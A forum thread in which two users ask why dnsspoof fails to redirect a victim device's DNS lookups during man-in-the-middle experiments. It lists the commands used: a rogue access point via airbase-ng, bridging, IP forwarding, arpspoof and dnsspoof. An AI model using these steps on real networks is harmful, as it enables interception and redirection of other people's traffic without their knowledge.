Jump to content

Dnsspoof not redirecting websites

forstbyte

By forstbyte
in Questions

 Share

Recommended Posts

forstbyte Newbie

forstbyte

Posted
Posted

Hello ,

i am currently working on MITM attacks and i am trying to redirect websites to my computer through dnsspoof and the problem is that ,although it is picking up traffic and i can see it registers all sites the victim is visiting , it is still letting the victim connect to the website instead of redirecting it to me.

Here is a my procedure:

-firstly i created a mon0 interface form wlan0 wireless card

-i started up my access point [ airbase-ng --essid mitm -c 11 mon0 ]

-then i created a bridge between at0 and eth0 :

brctl addbr mitm-bridge

brctl addif mitm-bridge eth0

brctl addif mitm-bridge at0

ifconfig eth0 0.0.0.0 up

ifconfig at0 0.0.0.0 up

-then i went into [ ifconfig ] to see my ip ( lets say it is 150.150.1.1 ) and did :

ifconfig mitm-bridge 150.150.1.1 up

-so now my machine and the bridge have the same ip

-then i did ip forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

-i connected the victim to the airbase-ng and everything was fine .The traffic was going through and there was no problem.

-then i did:

dnsspoof -i mitm-bridge

-it started and when i went to google.com on the victim machine it didnt reroute it.It just went to google.com

-when it connected to google.com it showed :

192.168.1.13 .<some random 5 digit number> > 192.186.1.1.53 A? google.com

-from where i was getting my information about dnsspoof it showed that instead of the 192.168.1.13 ( the ip of the victim device ) should be 150.150.1.1 ( attacking device ) and it was stated that the connection would be refused but it wasnt!

Please help me!

I am trying to figure this out for a week now...

Good day!

shootout Newbie

shootout

Posted
Posted

I am having the same problem man.

I didnt bridge anything.

I go arpsoof and its working .

Then ip_forward and its all ok . But then i do sudo dnsspoof -i wlan0 -f myresolver.txt which is the file i have all the redirections.

192.168.0.11.7020 > 217.16.112.21.53: 63814+ A? www.youtube.com

192.168.0.11.7020 > 217.16.112.21.53: 63814+ A? www.youtube.com

this is what i get and nothing happens it just goes to youtube.

Why is this happening i am doing everything .

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...